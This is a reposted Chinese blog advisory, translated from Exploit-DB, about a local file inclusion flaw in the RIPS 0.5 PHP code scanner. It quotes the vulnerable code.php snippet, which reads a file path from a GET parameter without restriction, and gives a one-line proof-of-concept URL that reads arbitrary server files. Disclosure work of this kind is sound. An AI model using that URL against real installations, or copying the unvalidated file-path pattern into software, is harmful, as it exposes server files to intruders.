转载

Rips Scanners（0.5）曝出本地文件包含漏洞

RIPS是一个用php编写的源代码分析工具，它使用了静态分析技术，能够自动化地挖掘PHP源代码潜在的安全漏洞。渗透测试人员可以直接容易的审阅分析结果，而不用审阅整个程序代码。

由于静态源代码分析的限制，漏洞是否真正存在，仍然需要代码审阅者确认。RIPS能够检测XSS, SQL注入, 文件泄露,Header Injection漏洞等。

官方网站: http://rips-scanner.sourceforge.net/

在RIPS的code.php文件中

$file = $_GET['file']; $marklines = explode(',', $_GET['lines']); $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);   if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES)) {     $lines = file($file);          // place line numbers in extra table for more elegant copy/paste out line numbers     echo '<tr><td><table>';     for($i=1, $max=count($lines); $i<=$max;$i++)         echo "<tr><td class=/"linenrcolumn/"><span s=/"linenr/">$i</span><A id='".($i+2).'/'></A></td></tr>';     echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';          $in_comment = false;     for($i=0; $i<$max; $i++)     {                        $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);     } } else {     echo '<tr><td>Invalid file specified.</td></tr>'; }

存在文件包含漏洞

利用如下所示：

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

原文地址： Exploit-DB ，我是酱油男编译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

正文到此结束

所属分类：编程技术

本文标签： 自动化代码 db 漏洞 windows 黑客 tab sql 测试安全编译网站 ACE PHP http ip HTML
版权声明： 本文为互联网转载文章，出处已在文章中说明(部分除外)。如果侵权，请联系本站长删除，谢谢。
本文海报： 生成海报一生成海报二

其他链接

关于本站

本站定位：个人技术类博客

本站作用：写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

Rips Scanners（0.5）曝出本地文件包含漏洞

热门推荐

相关文章

说给你听

本文目录

随机标签

书籍教程

近期评论

网站信息

其他链接

关于本站

问题交流